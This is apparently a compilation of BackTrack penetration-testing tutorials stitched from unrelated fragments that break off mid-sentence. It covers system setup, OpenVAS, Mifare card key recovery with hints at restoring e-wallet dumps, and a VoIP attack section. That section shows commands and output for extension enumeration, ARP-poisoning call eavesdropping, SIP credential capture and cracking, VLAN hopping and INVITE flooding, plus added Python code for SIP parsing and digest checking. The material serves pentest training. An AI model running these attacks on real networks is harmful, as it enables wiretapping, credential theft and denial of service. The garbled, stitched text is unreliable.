Logging in to BackTrack
Once the installation of BackTrack is done, the default username and password required to
log in are root / toor.
NOTE: You will not be able to see the password as you type it.
Starting a GUI Environment
After you are logged in you can start the GUI Environment by issuing the startx command.
X won't start!
On rare occasions (such as after a VMware tools install, or when using unsupported video
cards), X will refuse to start. If that happens you have several options you can try in order to
fix the issue:
Reconfigure the X server package: you can reset (and often fix) the Xorg configuration
with the following command:
root@bt:~# dpkg-reconfigure xserver-xorg
If you are using Backtrack 5 on x64 with KDE you should try the following:
root@bt:~# rm /root/.kde/cache-*
NOTE: Sometimes you may need to also remove the cache folders in /var/tmp by issuing
the following command:
root@bt:~# rm -rf /var/tmp/kdecache-*
Getting Networking to work
If you haven't noticed yet, BackTrack does not boot with networking enabled by default, in
order to increase its stealth.
Setting your IP manually
We will first set up the networking manually. In the following example we will assume the
following addresses and their purpose:
IP Address - 192.168.1.112/24
Default Gateway - 192.168.1.1
DNS server - 192.168.1.1
In order to set these up we will run the following commands:
In order to get an IP from a DHCP server we can issue the dhclient <interface> command
as follows:
root@bt:~# dhclient eth0
Internet Systems Consortium DHCP Client V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Listening on LPF/eth0/00:0c:29:81:74:21
Sending on LPF/eth0/00:0c:29:81:74:21
Sending on Socket/fallback
DHCPREQUEST of 192.168.1.112 on eth0 to 255.255.255.255 port 67
DHCPACK of 192.168.1.112 from 192.168.1.1
bound to 192.168.1.112 -- renewal in 37595 seconds.
root@bt:~#
Using the script to start networking
There is a script to start networking in the /etc/init.d directory which attempts to start every
interface listed in /etc/network/interfaces (you can remove the ones you don't need). To
start it, issue the following command:
root@bt:~# /etc/init.d/networking start
WICD Network Manager
Another way to set up your networking is using the WICD Network Manager; you can find it
in the menu:
Menu > Internet > Wicd Network Manager
NOTE: Notice that when starting WICD you will get an error:
In order to get rid of this error you have to reboot BackTrack, then BEFORE starting WICD
apt-get install <package> Downloads <package> and all of its dependencies, and installs or
upgrades them.
apt-get remove [--purge] <package> Removes <package> and any packages that depend
on it. --purge specifies that packages should be purged.
apt-get update Updates package listings from the repo; should be run at least once a
week.
apt-get upgrade Upgrades all currently installed packages with the updates available from
the repo; should be run once a week.
apt-get dist-upgrade [-u] Similar to apt-get upgrade, except that dist-upgrade will install or
remove packages to satisfy dependencies.
apt-cache search <pattern> Searches packages and descriptions for <pattern>.
apt-cache show <package> Shows the full description of <package>.
apt-cache showpkg <package> Shows a lot more detail about <package>, and its
relationships to other packages.
man apt Will give you more info on these commands as well as many that are in less
common usage.
Common dpkg commands
dpkg -i <package.deb> Installs a package file; one that you downloaded manually, for
example.
dpkg -c <package.deb> Lists the contents of <package.deb>, a .deb file.
dpkg -I <package.deb> Extracts package information from <package.deb>, a .deb file.
dpkg -r <package> Removes an installed package named <package>.
dpkg -P <package> Purges an installed package named <package>. The difference
between remove and purge is that while remove only deletes data and executables, purge
also deletes all configuration files in addition.
dpkg -L <package> Gives a listing of all the files installed by <package>. See also dpkg -c
for checking the contents of a .deb file.
dpkg -s <package> Shows information on the installed package <package>. See also
apt-cache show for viewing package information in the Debian archive and dpkg -I for
viewing package information extracted from a .deb file.
dpkg-reconfigure <package> Reconfigures an installed package
man dpkg Will give you more info on these commands as well as many that are in less
common usage.
How do I find more information on a particular command or program's usage?
Most commands will have what is called a man page (manual page) which can be viewed
by typing:
root@bt:~# man <command you want more info on>
Another very good resource on Linux command usage can be found at linuxcommand.org
Some programs do not have a man page, but you can usually get more information on their
usage by typing:
root@bt:~# <program name> Just the program name without any arguments.
or
root@bt:~# <program name> -help
or
root@bt:~# <program name> --help
or
root@bt:~# <program name> -h
Some programs use other methods, but they are usually just a variation of one of the above
five commands.
Occasionally you might want to compile code that requires kernel headers (such as
compat-wireless, or other drivers). These are quick instructions on how to do so.
root@bt:~# prepare-kernel-sources
root@bt:~# cd /usr/src/linux
root@bt:~# cp -rf include/generated/* include/linux/
NOTE: You need to be connected to the internet in order to download the linux-source
package.
Enable PAE on Backtrack5 R2
NOTE: Do not change any other settings in your kernel unless you know exactly what
you are doing!
In this tutorial we will proceed to enable PAE on Backtrack5 R2.
We first prepare our kernel and enter the kernel menuconfig.
root@bt:~# prepare-kernel-sources
root@bt:/usr/src/linux# zcat /proc/config.gz > .config
root@bt:/usr/src/linux# make menuconfig
After we have launched the ncurses menuconfig we proceed to enable PAE, which can
be found under: Processor type and features -> High Memory Support (4) -> 64GB
Once we have enabled PAE from the menuconfig we proceed into building our kernel.
root@bt:/usr/src/linux# make scripts
root@bt:/usr/src/linux# make prepare
root@bt:/usr/src/linux# make
root@bt:/usr/src/linux# update-initramfs -u
root@bt:~# update-grub2
We then reboot and check to see if PAE is enabled.
root@bt:~# cat /boot/config-3.2.4 | grep HIGHMEM
# CONFIG_HIGHMEM64G is not set
CONFIG_HIGHMEM=y
PAE is enabled when this output contains CONFIG_HIGHMEM64G=y; a line reading
"# CONFIG_HIGHMEM64G is not set", as above, means the kernel whose config file you are
reading was built without it.
NOTE: Changing additional options in the ncurses config without knowing what the
Exit the ncurses menu config, and build your kernel package:
root@bt:/usr/src/linux# make prepare
root@bt:/usr/src/linux# make
root@bt:/usr/src/linux# make modules_install
root@bt:/usr/src/linux# make install
root@bt:/usr/src/linux# update-initramfs -u
root@bt:/usr/src/linux# update-grub2
openvasadmin is the username I have chosen to become this user, you however can
substitute that with something better suited to you if you so choose. Make sure you can
remember this username and associated password as you WILL need it when running
openvas.
root@bt:~# openvasad -c 'add_user' -n openvasadmin -r Admin
Enter password:
ad   main:MESSAGE:5871:2011-05-26 04h57.08 BST: No rules file provided, the new user will have no restrictions.
ad   main:MESSAGE:5871:2011-05-26 04h57.08 BST: User openvasadmin has been successfully created.
root@bt:~#
Starting OpenVAS Manager
Now we need to start Openvas Manager
This runs as a daemon in the background. As I am running everything from my local
machine I will be using localhost to listen on and in this case the default port. This is done
by running the following command.
openvasmd -p 9390 -a 127.0.0.1
Starting OpenVAS Administrator
Now we need to start Openvas Administrator
This also runs as a daemon in the background. As I am running everything from my local
machine I will be using localhost to listen on and in this case the default port. This is done
by running the following command.
openvasad -a 127.0.0.1 -p 9393
Starting Greenbone Security Assistant
Now we need to start Greenbone security Assistant
This again runs as a daemon in the background. As I am running everything from my local
machine I will be using localhost to listen on and in this case the default port. This is done
by running the following command.
gsad --http-only --listen=127.0.0.1 -p 9392
More info on the above commands and other options can be found by running their
associated menu entry and by looking at the man pages. As all three of these run as
daemons and will continue running until you shut down your computer, I have provided menu
entries so that you can stop them when you no longer need them.
At this point your installation is essentially complete, but as we have got this far we may as
well continue to make sure everything is working as expected.
OpenVAS user interfaces
Greenbone security desktop
Now we need to start an application to enable you to communicate with the scanner and
other daemons.
The first of these choices is Greenbone Security Desktop.
Start this from the menu item and fill in the credentials and details we created earlier, then
click the login button.
Once logged in you can use this as your scanning interface, or use the next choice if you
prefer.
Web interface
This next method is via a web interface
Open your favorite browser and enter the following address
127.0.0.1:9392
You will then be presented with a login page. Log in with the credentials we created earlier.
You can also use the -k key parameter to add a key to the list of known keys, which is
tried against your card in the initial phase. The -k option somehow didn't work for me,
so I always compile my known keys directly into mfoc.c. Search for "Array with default Mifare
Classic keys". Not sure about other countries, but in the country where I live the keys are the same.
Once you have keys from all sectors, you should be able to use RFID-Fu against other
cards, which is epic fail.
root@bt:~# nfc-mfclassic --help
Usage: nfc-mfclassic r|w a|b <dump.mfd> [<keys.mfd>]
  r|w           - Perform read from (r) or write to (w) card
  a|b           - Use A or B keys for action
  <dump.mfd>    - MiFare Dump (MFD) used to write (card to MFD) or (MFD to card)
  <keys.mfd>    - MiFare Dump (MFD) that contain the keys (optional)
Or: nfc-mfclassic x <dump.mfd> <payload.bin>
  x             - Extract payload (data blocks) from MFD
  <dump.mfd>    - MiFare Dump (MFD) that contains wanted payload
  <payload.bin> - Binary file where payload will be extracted
Keep in mind that the card UID will not be affected (not changed) by this process. Buy a
blank card or a Proxmark III if that is what you want. If you are now thinking about dumping
your electronic wallet right after a recharge and, when the credit comes to zero, writing the
content back, then please don't do it. What can stop you from doing that? Well, probably only your
conscience, but if the card gets blocked within 24 hours after first use then don't complain. Yes,
there are online checking and billing systems out there for basic cards.
0x04 – ISIC Issue
With an ISIC (International Student Identity Card) an attacker can abuse around ten services, not
only one. ISIC cards are widely used for entrance, transportation, dining payments and
various other services or discounts. According to the ISIC homepage there are 4.5 million
cardholders in 120 countries. Cards should be replaced with more secure types ASAP. It is
possible to do much more than that, but as this is sufficient for a demonstration, let's play a little...
The whole purpose of this was to get nvcc compiler installed. You can check that everything
is set up correctly:
root@bt:~# which nvcc
/opt/cuda/bin/nvcc
root@bt:~# nvcc -V
nvcc: NVIDIA (R) Cuda compiler driver
Copyright (c) 2005-2011 NVIDIA Corporation
Built on Sun_Mar_20_16:45:27_PDT_2011
Cuda compilation tools, release 4.0, V0.2.1221
root@bt:~#
Now that the Nvidia driver and CUDA toolkit are installed, we can test their functionality with
a GPU powered tool such as pyrit.
root@bt:~# svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit
root@bt:~# cd pyrit/pyrit && python setup.py build && python setup.py install
root@bt:~# cd ../../
root@bt:~# cd pyrit/cpyrit_cuda && python setup.py build && python setup.py install
Run a benchmark to see that everything works as expected:
root@bt:~# pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
NOTE: Do the exact same thing on the client.
Once we have the server and the client set up, it's time to enable our SSH server and
transfer the configuration files from the server to the client.
If we start the cluster we should see our server and client.
root@bt:~# mpdboot -v --file=/root/mpd.hosts -n 2
running mpdallexit on bt
LAUNCHED mpd on bt via
RUNNING: mpd on bt
LAUNCHED mpd on 192.168.1.70 via bt2
RUNNING: mpd on 192.168.1.70
According to the request made by the client, a response will be received with a status or error code. The following tables describe the available requests and responses in the SIP protocol.
SIP Requests / Methods
Request     Description
INVITE      Used to invite an account to participate in a call session.
ACK         Acknowledge an INVITE request.
CANCEL      Cancel a pending request.
REGISTER    Register user with a SIP server.
OPTIONS     Lists information about the capabilities of a caller.
BYE         Terminates a session between two users in a call.
REFER       Indicates that the recipient (identified by the Request-URI) should contact a third party using the contact information provided in the request.
SUBSCRIBE   The SUBSCRIBE method is used to request current state and state updates from a remote node.
NOTIFY      The NOTIFY method is used to notify a SIP node that an event which has been requested by an earlier SUBSCRIBE method has
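The request and status lines described in the table above can be picked apart programmatically. The following parser is an added example written for this page (it is not part of BackTrack or of any tool named here); the OPTIONS probe and the 200 OK reply it parses are constructed samples whose addresses and header values are made up.

```python
"""Minimal SIP message parser (added example, not part of the original page).

It classifies a raw SIP message as a request or a response, using the
request/method table above, so that e.g. an OPTIONS probe from a scanner
or a '200 OK' reply can be inspected programmatically.
"""
import re

# Methods from the table above, with the page's one-line descriptions.
SIP_METHODS = {
    "INVITE": "invite an account to participate in a call session",
    "ACK": "acknowledge an INVITE request",
    "CANCEL": "cancel a pending request",
    "REGISTER": "register a user with a SIP server",
    "OPTIONS": "list information about the capabilities of a caller",
    "BYE": "terminate a session between two users in a call",
    "REFER": "ask the recipient to contact a third party",
    "SUBSCRIBE": "request current state and state updates from a remote node",
    "NOTIFY": "notify a SIP node of an event requested by an earlier SUBSCRIBE",
}

_REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) SIP/2\.0$")
_STATUS_LINE = re.compile(r"^SIP/2\.0 (\d{3}) (.*)$")


def parse_sip_message(raw):
    """Return a dict describing a SIP request or response.

    Accepts CRLF or LF line endings. Raises ValueError on a start line
    that is neither a request line nor a status line.
    """
    lines = raw.replace("\r\n", "\n").split("\n")
    start, rest = lines[0], lines[1:]
    msg = {"headers": {}}
    m = _REQUEST_LINE.match(start)
    if m:
        method, uri = m.groups()
        msg.update(kind="request", method=method, uri=uri,
                   known=method in SIP_METHODS)
    else:
        m = _STATUS_LINE.match(start)
        if not m:
            raise ValueError("not a SIP start line: %r" % start)
        code, reason = m.groups()
        msg.update(kind="response", status=int(code), reason=reason)
    # Headers run until the first empty line; anything after it is the body.
    for i, line in enumerate(rest):
        if line == "":
            msg["body"] = "\n".join(rest[i + 1:])
            break
        name, _, value = line.partition(":")
        msg["headers"][name.strip().lower()] = value.strip()
    else:
        msg["body"] = ""
    return msg


def describe(msg):
    """One-line summary of a parsed message, using the table descriptions."""
    if msg["kind"] == "request":
        what = SIP_METHODS.get(msg["method"], "unknown method")
        return "%s request to %s: %s" % (msg["method"], msg["uri"], what)
    return "response %d %s" % (msg["status"], msg["reason"])


# Constructed sample: an OPTIONS probe of the kind a scanner such as SMAP
# sends, and the 200 OK that a reachable device answers with. The Allow
# header carries the capabilities that OPTIONS asks for; User-Agent is the
# field fingerprinting tools such as sipsak read.
SAMPLE_OPTIONS = (
    "OPTIONS sip:192.168.1.104 SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.168.1.105:5060;branch=z9hG4bK-example\r\n"
    "From: <sip:scan@192.168.1.105>;tag=1234\r\n"
    "To: <sip:192.168.1.104>\r\n"
    "Call-ID: constructed-call-id@192.168.1.105\r\n"
    "CSeq: 1 OPTIONS\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)
SAMPLE_200_OK = (
    "SIP/2.0 200 OK\r\n"
    "Via: SIP/2.0/UDP 192.168.1.105:5060;branch=z9hG4bK-example\r\n"
    "CSeq: 1 OPTIONS\r\n"
    "User-Agent: Example-UA/1.0\r\n"
    "Allow: INVITE, ACK, CANCEL, OPTIONS, BYE\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for raw in (SAMPLE_OPTIONS, SAMPLE_200_OK):
        print(describe(parse_sip_message(raw)))
```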
extensions. Let's take a look at some of the tools which are available
in BackTrack to help us find, identify and enumerate VoIP enabled devices.
SMAP
BackTrack includes a great tool called SMAP, which is a simple scanner for
SIP enabled devices. SMAP sends off various SIP requests and awaits
responses from SIP enabled DSL routers, proxies and user agents.
It could be considered a mash-up of NMAP and sipsak.
SMAP Usage:
root@bt:/pentest/voip/smap# ./smap
smap 0.6.0 http://www.wormulon.net/
usage: smap [ Options ]
-h: this help
-d: increase debugging
-o: enable fingerprinting
-O: enable more verbose fingerprinting
-l: fingerprint learning mode
-t: TCP transport
-u: UDP transport (default)
-P0: Treat all hosts as online - skip host discovery
-p : destination port
-r : messages per second rate limit
-D : SIP domain to use without leading sip:
-w : timeout in msec
Another useful feature of SMAP is the -d argument, which enables debug output for verbosity; try using -o along with it to view the fingerprinting process in detail.
-h            displays this help message
-V            prints version string only
-f FILE       the file which contains the SIP message to send
              use - for standard input
-L            de-activate CR (\r) insertion in files
-s SIPURI     the destination server uri in form sip:[user@]servername[:port]
-T            activates the traceroute mode
-U            activates the usrloc mode
-I            simulates a successful calls with itself
-M            sends messages to itself
-C SIPURI     use the given uri as Contact in REGISTER
-b NUMBER     the starting number appendix to the user name (default: 0)
-e NUMBER     the ending numer of the appendix to the user name
-o NUMBER     sleep number ms before sending next request
-x NUMBER     the expires header field value (default: 15)
-z NUMBER     activates randomly removing of user bindings
-F            activates the flood mode
-R            activates the random modues (dangerous)
-t NUMBER     the maximum number of trashed character in random mode (default: request length)
-l PORT       the local port to use (default: any)
-r PORT       the remote port to use (default: 5060)
-p HOSTNAME   request target (outbound proxy)
-H HOSTNAME   overwrites the local hostname in all headers
-m NUMBER     the value for the max-forwards header field
-n            use FQDN instead of IPs in the Via-Line
-i            deactivate the insertion of a Via-Line
-a PASSWORD   password for authentication (if omitted password="")
-u STRING     Authentication username
-d            ignore redirects
-v            each v produces more verbosity (max. 3)
-w            extract IP from the warning in reply
-g STRING     replacement for a special mark in the message
-G            activates replacement of variables
-N            returns exit codes Nagios compliant
-q STRING     search for a RegExp in replies and return error on failure
-W NUMBER     return Nagios warning if retrans > number
-B STRING     send a message with string as body
-O STRING     Content-Disposition value
-P NUMBER     Number of processes to start
-A NUMBER     number of test runs and print just timings
-S            use same port for receiving and sending
-c SIPURI     use the given uri as From in MESSAGE
-D NUMBER     timeout multiplier for INVITE transactions and reliable transports (default: 64)
-E STRING     specify transport to be used
-j STRING     adds additional headers to the request
Here is an example of using sipsak to fingerprint a SIP enabled device. We can see in the result that the device we queried is an Audiocodes MP-114 FXS gateway.
** reply received after 67.923 ms **
   SIP/2.0 200 OK
   final received
SIPScan
Sip-scan is a simple scanner for SIP enabled hosts; it can scan a single host or
an entire subnet.
Sip-scan usage:
root@bt:/pentest/voip/sipscan# ./sip-scan --help
./sip-scan version [unknown] calling Getopt::Std::getopts (version 1.05),
running under Perl version 5.10.0.
Usage: sip-scan [options]
 -v        Be verbose.
 -i ip|if  Interface/IP for SIP-headers (default: IP from ppp0)
 -p port   remote port to scan. (default: 5060)
 -l port   local origin of packets. (default: 5060)
 -d n[p]   Wait n ms after each sent packet (default: 50ms)
           or if 'p' is given, send n packets per second (default: 20)
 -w n      Wait n ms for remaining answers (default: 2000ms)
Network spec contains the wildcard * or ranges n-m.
Svwar has identified all the extensions I've created on my Trixbox server. You can specify another SIP method by using the -m argument; you can also add -v or -vv for verbosity.
Enumiax is used to enumerate Asterisk Exchange protocol usernames. It
allows for a dictionary attack or sequential username guessing.
root@bt:/pentest/voip/enumiax# ./enumiax
enumIAX 1.0
Dustin D. Trammell
Usage: enumiax [options] target
options:
  -d    Dictionary attack using file
  -i    Interval for auto-save (# of operations, default 1000)
  -m #  Minimum username length (in characters)
  -M #  Maximum username length (in characters)
  -r #  Rate-limit calls (in microseconds)
  -s    Read session state from state file
  -v    Increase verbosity (repeat for additional verbosity)
  -V    Print version information and exit
  -h    Print help/usage information and exit
root@bt:/pentest/voip/enumiax# ./enumiax -v -m3 -M3 192.168.1.104
enumIAX 1.0
Dustin D. Trammell
Target Aquired: 192.168.1.104
Connecting to 192.168.1.104 via udp on port 4569...
Starting enum process at: Sat Feb 5 13:04:18 2011
Now working on 3 character usernames...
root@bt:/pentest/voip/enumiax# ./enumiax -d dict -v 192.168.1.104
enumIAX 1.0
Dustin D. Trammell
Target Aquired: 192.168.1.104
Connecting to 192.168.1.104 via udp on port 4569...
Starting enum process at: Sat Feb 5 13:02:39 2011
Monitor mode – should be used on shared media where the IP phones are
connected, i.e. a hub or wireless access point; it can also be used in a
switched environment by setting up a SPAN session on a Cisco switch.
Man in the middle mode – this mode has 2 additional modes, which are:
Learning Mode
Targeted Mode
Preparing UCSniff so we can run it from any location in
backtrack:
root@bt:/tmp# cd /pentest/voip/ucsniff/
root@bt:/pentest/voip/ucsniff# ./configure
root@bt:/pentest/voip/ucsniff# make
root@bt:/pentest/voip/ucsniff# make install
Monitor Mode Usage
root@bt:/tmp/ucsniff# ucsniff -i eth0 -M
UCSniff 2.1 starting
Running in Monitor Mode
File directory-users.txt can't be opened for reading in working directory
File targets.txt can't be opened for reading in working directory
Listening on eth0... (Ethernet)
  eth0 -> 00:0C:29:84:98:B2  192.168.1.105  255.255.255.0
Starting Unified sniffing...
Warning: Please ensure that you hit 'q' when you are finished with this program.
Warning: 'q' re-ARPs the victims. Failure to do so before program exit will result in a DoS.
SIP Call in progress. (extension 200, ip 192.168.1.104) calling (extension 201, ip 192.168.1.118)
SIP Call in progress. (extension 200, ip 192.168.1.105) calling (extension 201, ip 192.168.1.104)
SIP Call ended. Conversation recorded in file '200-Calling-201-5:2:7-3-both.wav'
SIP Call ended. Conversation recorded in file '200-Calling-201-5:2:8-2-both.wav'
Closing text interface...
Unified sniffing was stopped.
We can stop the sessions by pressing on the Q key.
Several files were created by UCSniff:
Log files – contain detailed information about SIP transactions
Pcap files – capture files which can be viewed in Wireshark
Audio wav files – conversation audio files
root@bt:/tmp/ucsniff# ls -l
total 376
-rw-r--r-- 1 root root  40854 Feb 5 05:02 200-Calling-201-5:2:7-3-both.wav
-rw-r--r-- 1 root root 115818 Feb 5 05:02 200-Calling-201-5:2:7-3.pcap
-rw-r--r-- 1 root root  46294 Feb 5 05:02 200-Calling-201-5:2:8-2-both.wav
-rw-r--r-- 1 root root 103940 Feb 5 05:02 200-Calling-201-5:2:8-2.pcap
-rw-r--r-- 1 root root    278 Feb 5 05:02 call_detail_log
-rw-r--r-- 1 root root    317 Feb 5 05:02 call_log
-rw-r--r-- 1 root root  10063 Feb 5 05:02 sip.log
-rw-r--r-- 1 root root  39073 Feb 5 05:02 sipdump.pcap
-rw-r--r-- 1 root root      0 Feb 5 05:01 skinny_log
MITM Learning Mode Usage
This mode uses a signaling protocol (SIP, Skinny) to map
extensions to IP addresses. You can customize the targets
to only intercept specific IP addresses or networks. In the
following example we assume we are on the VoIP VLAN;
UCSniff will ARP poison all hosts on the subnet.
root@bt:/tmp/ucsniff# ucsniff -i eth0 // //
UCSniff 2.1 starting
Listening on eth0... (Ethernet)
  eth0 -> 00:0C:29:84:98:B2  192.168.1.105  255.255.255.0
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
ARP poisoning victims:
 GROUP 1 : ANY (all the hosts in the list)
 GROUP 2 : ANY (all the hosts in the list)
Mapped new target entry: (IP: 192.168.1.118) --> extension 201 and name:
Mapped new target entry: (IP: 192.168.1.104) --> extension 200 and name:
SIP Call in progress. (extension 201, ip 192.168.1.118) calling (extension 200, ip 192.168.1.104)
SIP Call ended. Conversation recorded in file '201-Calling-200-5:13:4-2-both.wav'
Closing text interface...
ARP poisoner deactivated.
RE-ARPing the victims...
Unified sniffing was stopped.
If we take a look at UCSniff log files we can see the discovered targets used in the attack.
Target Mode enables eavesdropping at a layer higher than just
random audio streams or the IP address of phones for which
you don't know the extension. This mode has 2 sub modes:
Targeted User and Targeted Conversation. We can add targets
manually to the "targets.txt" file in the following format:
x.x.x.x,extension,,sip
192.168.1.118,201,,sip
Or use learning mode to auto discover hosts.
root@bt:/tmp/ucsniff# ucsniff -i eth0 -T
UCSniff 2.1 starting
File targets.txt can't be opened for reading in working directory
No targets have been previously discovered in Targets file, targets.txt
Please run UCSniff in learning mode, or manually edit targets.txt
Once a valid targets.txt file is found you will be asked to choose an eavesdropping mode:
root@bt:/tmp/ucsniff# ucsniff -i eth0 -T
UCSniff 2.1 starting
Parsed 2 entries in Targets file, targets.txt
UCSniff running in target mode. Parsed 2 previously discovered targets
Please select a Targeted Eavesdropping Mode:
1. User
Description: Eavesdrop on all calls to or from a particular endpoint.
2. Conversation
Description: Eavesdrop on bi-directional conversation flows between two selected endpoints.
Please select option (1) or (2):
Selecting "User" tells the tool to intercept all traffic between the one Target, and the rest of the network.
In "Conversation", two endpoints are selected and the network
is ARP Poisoned to only intercept the traffic between those two
Although Xplico is not in the Backtrack voip tools directory, it is
a very useful tool for capturing SIP and RTP traffic (among
other protocols). Xplico can be found in the Backtrack ->
Digital Forensics -> Forensic Analysis menu
In case it is not present on your Backtrack installation you can
simply install it by issuing the following command:
root@bt:~# apt-get install xplico
Xplico can be used to capture live traffic or import a Wireshark PCAP capture file. Either way, Xplico will decode the captured packets and assemble them into the appropriate format; in our case it will be SIP and RTP. After executing Xplico you will be asked to log in; the default username and password are: xplico
SIPDump is a part of the SIPCrack tool suite; it performs a live capture
of SIP authentication digest responses, or it can dump previously
captured sessions from a PCAP file. SIPDump usage:
root@bt:/pentest/voip/sipcrack# ./sipdump -i eth0
SIPdump 0.3 ( MaJoMu | www.codito.de )
---------------------------------------
Usage: sipdump [OPTIONS]
          = file where captured logins will be written to
Options:
  -i      = interface to listen on
  -p      = use pcap data file
  -m      = enter login data manually
  -f ""   = set libpcap filter
* You need to specify dump file

  -s          = use stdin for passwords
  -w wordlist = file containing all passwords to try
  -p num      = print cracking process every n passwords (for -w)
                (ATTENTION: slows down heavily)
* Either -w or -s has to be given
SIPCrack can operate in two modes:
Dictionary attack
STDIN
Dictionary attack
Backtrack provides some basic dictionaries which are
located in:
root@bt:/pentest/passwords/wordlists
But for the purpose of this article I will use another great tool in BackTrack called Crunch, which is used to create custom dictionaries. Let's use Crunch to create a six-character numeric dictionary. Crunch is located in:
root@bt:/pentest/passwords/crunch# ./crunch 6 6 -f charset.lst numeric -o /pentest/voip/sipcrack/sipass.txt
Crunch will now generate 7000000 bytes of data
Crunch will now generate 6 MB of data
Crunch will now generate 0 GB of data
100%
We will use previously captured SIP credentials stored by SIPDump in the auth.txt file, and sipass.txt as the dictionary (which we created using Crunch).
Cracking the Digest Response:
root@bt:/pentest/voip/sipcrack# ./sipcrack -w sipass.txt auth.txt
SIPcrack 0.3 ( MaJoMu | www.codito.de )
----------------------------------------
* Found Accounts:
Num  Server         Client         User  Hash|Password
1    192.168.1.101  192.168.1.104  200   3a33e768ed6f630347f4b511371926bd
* Select which entry to crack (1 - 1): 1
* Generating static MD5 hash... 0a84f78fde66bb15197eab961462dc2f
* Starting bruteforce against user '200' (MD5: '3a33e768ed6f630347f4b511371926bd')
* Loaded wordlist: 'sipass.txt'
* Starting bruteforce against user '200' (MD5: '3a33e768ed6f630347f4b511371926bd')
* Tried 123457 passwords in 0 seconds
* Found password: '123456'
* Updating dump file 'auth.txt'... done
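To see what sipcrack is actually testing per guess, here is the SIP digest computation (RFC 2617 digest as used by SIP) as an added example written for this page; it is not sipcrack's code. It assumes the plain digest variant without qop, and the realm and nonce in the constructed sample are made up, while the user, server address and password mirror the run above.

```python
"""SIP digest authentication, worked through (added example; not sipcrack code).

The client proves knowledge of the password without sending it, but the
proof is a fast MD5 over a few fields that all travel in the clear, so
everything needed for an offline guess is in one captured REGISTER.
Assumes the plain digest variant without qop.
"""
import hashlib


def md5_hex(s):
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def ha1(username, realm, password):
    """HA1 = MD5(username:realm:password), the only part that depends on the secret."""
    return md5_hex("%s:%s:%s" % (username, realm, password))


def ha2(method, uri):
    """HA2 = MD5(method:digest-uri).

    Independent of the password, so it is computed once per captured login;
    this is the 'static MD5 hash' line in the sipcrack output above.
    """
    return md5_hex("%s:%s" % (method, uri))


def digest_response(username, realm, password, method, uri, nonce):
    """response = MD5(HA1:nonce:HA2), the value sent in the Authorization header."""
    return md5_hex("%s:%s:%s" % (ha1(username, realm, password), nonce,
                                 ha2(method, uri)))


def verify_digest(captured, password):
    """Check a candidate password against a captured login.

    `captured` holds the fields a tool like sipdump records from the wire:
    username, realm, method, uri, nonce and the client's response. This is
    the same comparison the SIP server makes to accept the login, and it is
    also the entire per-guess cost of a dictionary run, which is why a
    six-digit numeric secret (10**6 candidates) falls in well under a second.
    """
    expected = digest_response(captured["username"], captured["realm"],
                               password, captured["method"],
                               captured["uri"], captured["nonce"])
    return expected == captured["response"]


def sample_capture(password="123456"):
    """Constructed sample login (realm and nonce are made up)."""
    cap = {
        "username": "200",
        "realm": "asterisk",            # constructed
        "method": "REGISTER",
        "uri": "sip:192.168.1.101",
        "nonce": "4f2a1b3c",            # constructed; a real nonce is server-issued
    }
    cap["response"] = digest_response(cap["username"], cap["realm"], password,
                                      cap["method"], cap["uri"], cap["nonce"])
    return cap


if __name__ == "__main__":
    cap = sample_capture()
    print("static HA2:", ha2(cap["method"], cap["uri"]))
    print("123456 matches:", verify_digest(cap, "123456"))
    print("654321 matches:", verify_digest(cap, "654321"))
```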
Brute Force attack using John The Ripper
For this attack mode we will be using John the Ripper, redirecting
John's output into a FIFO file which we'll feed into
SIPCrack. Creating a FIFO file:
root@bt:/tmp# mkfifo sipcrack
Generating passwords using john and redirecting the output to our FIFO file, for this example we will generate up to 6 digits only.
root@bt:~# john
[*] This script will take you to /pentest/passwords/jtr/
[*] From there, run ./john
root@bt:/pentest/passwords/jtr# ./john --incremental=digits --stdout=6 > /tmp/sipcrack
A typical CISCO switch port configuration for VoIP will look
something like:
Switch# conf t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#interface fastEthernet 0/1
Switch(config-if)#switchport mode access
Switch(config-if)#switchport access vlan 10
Switch(config-if)#switchport voice vlan 20
The IP phone will be configured with the appropriate VLAN ID (20) and the PC data traffic will flow through VLAN 10. Before we begin hopping around, we will have to enable support for the 802.1q protocol in BackTrack by typing:
VoIP Hopper also allows one to VLAN Hop to an arbitrary
VLAN, without sniffing for CDP. If you already know the
Voice VLAN ID or would like to VLAN Hop into another
VLAN just specify the vlan id.
root@bt:/pentest/voip/voiphopper# ./voiphopper -i eth0 -v 20
VoIP Hopper 1.00 Running in VLAN Hop mode ~ Trying to hop into VLAN 2
Added VLAN 20 to Interface eth0
Attempting dhcp request for new interface eth0.20
eth0.20   Link encap:Ethernet  HWaddr 00:0c:29:84:98:b2
          inet6 addr: fe80::20c:29ff:fe84:98b2/64 Scope:Link
          UP BROADCAST NOTRAILERS RUNNING MULTICAST  MTU:1500  Metric:1
A denial of service attack on VoIP services can render them
useless by intentionally damaging the availability of the network
and VoIP systems. This attack can occur on two levels: standard
network DoS attacks and VoIP-specific DoS attacks. Generally we
will send tons of data, flooding the network to consume all its
resources, or a specific protocol, in order to overwhelm it with
tons of requests. Let's take a quick overview of the tools available
in BackTrack.
Inviteflood
This tool can be used to flood a target with INVITE
requests; it can be used to target SIP gateways/proxies and
SIP phones.
root@bt:/pentest/voip/inviteflood# ./inviteflood
inviteflood - Version 2.0
June 09, 2006
Usage:
Mandatory -
        interface (e.g. eth0)
        target user (e.g. "" or john.doe or 5000 or "1+210-555-1212")
        target domain (e.g. enterprise.com or an IPv4 address)
        IPv4 addr of flood target (ddd.ddd.ddd.ddd)
        flood stage (i.e. number of packets)
Optional -
        -a flood tool "From:" alias (e.g. jane.doe)
